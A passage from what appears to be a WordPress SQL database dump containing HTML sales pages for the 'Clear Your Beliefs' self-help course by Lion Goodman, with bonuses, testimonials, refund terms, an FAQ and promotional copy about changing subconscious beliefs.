href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 700px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:08:24', '2014-06-18 02:08:24', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(996, 4194, '2014-06-17 21:09:09', '2014-06-18 02:09:09', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong 